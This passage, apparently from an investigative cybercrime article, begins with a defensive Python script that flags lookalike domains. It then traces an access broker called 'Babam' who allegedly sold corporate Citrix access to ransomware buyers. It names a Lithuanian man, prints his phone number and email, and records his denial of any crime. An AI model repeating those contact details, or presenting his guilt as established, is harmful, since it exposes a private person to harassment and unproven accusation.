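          "perfectmoney[.]co", "howtounlockiphonefree[.]com"]


def refang(domain):
    """Normalise a possibly defanged domain for comparison only."""
    return domain.strip().lower().replace("[.]", ".").rstrip(".")


def edit_distance(a, b):
    """Levenshtein distance using two rolling rows."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # deletion
                           cur[j - 1] + 1,             # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def classify(observed, protected=PROTECTED):
    """Return (reason, protected_domain) for a lookalike, else None."""
    d = refang(observed)
    host = d[4:] if d.startswith("www.") else d
    for p in protected:
        if host == p or host.endswith("." + p):
            return None  # the real domain or one of its subdomains
    for p in protected:
        if host == "www" + p:
            return ("missing-dot-www", p)  # the "." after "www" was omitted
        if edit_distance(host, p) == 1:
            return ("one-char-off", p)     # e.g. .co registered against .com
    label = host.split(".")[0]
    if label.startswith("www") and len(label) > 3:
        # Heuristic only: a fused "www" aimed at a brand not on the watchlist.
        return ("www-prefix-label", None)
    return None


if __name__ == "__main__":
    for name in SAMPLE:
        print(name, "->", classify(name))
```

The `www-prefix-label` rule will also match legitimate names that happen to begin with “www”, so treat it as a triage signal for newly seen domains in DNS or proxy logs rather than a block rule.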

A Google search for “Vytautas Mockus” says there’s a person by that name who runs a mobile food service company in Lithuania called “Palvisa.” A report on Palvisa (PDF) purchased from Rekvizitai.vz — an official online directory of Lithuanian companies — says Palvisa was established in 2011 by a Vytautas Mockus, using the phone number 86.7273687, and the email address bo3dom@gmail.com. The report states that Palvisa is active, but has had no employees other than its founder.

Reached via the bo3dom@gmail.com address, the 36-year-old Mr. Mockus expressed mystification as to how his personal information wound up in so many records. “I am not involved in any crime,” Mockus wrote in reply.

A rough mind map of the connections mentioned in this story.

The domains apparently registered by Babam over nearly 10 years suggest he started off mainly stealing from other cybercrooks. By 2015, Babam was heavily into “carding,” the sale and use of stolen payment card data. By 2020, he’d shifted his focus almost entirely to selling access to companies.

A profile produced by threat intelligence firm Flashpoint says Babam has received at least four positive feedback reviews on the Exploit cybercrime forum from crooks associated with the LockBit ransomware gang.

The ransomware collective LockBit giving Babam positive feedback for selling access to different victim organizations. Image: Flashpoint

According to Flashpoint, in April 2021 Babam advertised the sale of Citrix credentials for an international company that is active in the field of laboratory testing, inspection and certification, and that has more than $5 billion in annual revenues and more than 78,000 employees.

Flashpoint says Babam initially announced he’d sold the access, but later reopened the auction because the prospective buyer backed out of the deal. Several days later, Babam reposted the auction, adding more information about the depth of the illicit access and lowering his asking price. The access sold less than 24 hours later.

“Based on the provided statistics and sensitive source reporting, Flashpoint analysts assess with high confidence that the compromised organization was likely Bureau Veritas, an organization headquartered in France that operates in a variety of sectors,” the company concluded.

In November, Bureau Veritas acknowledged that it shut down its network in response to a cyber attack. The company hasn’t said whether the incident involved ransomware and if so what strain of ransomware, but its response to the incident is straight out of the playbook for responding to ransomware attacks. Bureau Veritas has not yet responded to requests for comment; its latest public statement on Dec. 2 provides no additional details about the cause of the incident.

Flashpoint notes that Babam’s use of transliterated Russian persists on both Exploit and Verified until around March 2020, when he switches over to using mostly Cyrillic in his forum comments and sales threads. Flashpoint said this could be an indication that a different person started using the Babam account since then, or more likely that Babam had only a tenuous grasp of Russian to begin with and that his language skills and confidence improved over time.

Lending credence to the latter theory is that Babam still makes linguistic errors in his postings that suggest Russian is not his original language, Flashpoint found.

“The use of double “n” in such words as “проданно” (correct – продано) and “сделанны” (correct – сделаны) by the threat actor proves that this style of writing is not possible when using machine translation since this would not be the correct spelling of the word,” Flashpoint analysts wrote.

“These types of grammatical errors are often found among people who did not receive sufficient education at school or if Russian is their second language,” the analysis continues. “In such cases, when someone tries to spell a word correctly, then by accident or unknowingly, they overdo the spelling and make these types of mistakes. At the same time, colloquial speech can be fluent or even native. This is often typical for a person who comes from the former Soviet Union states.”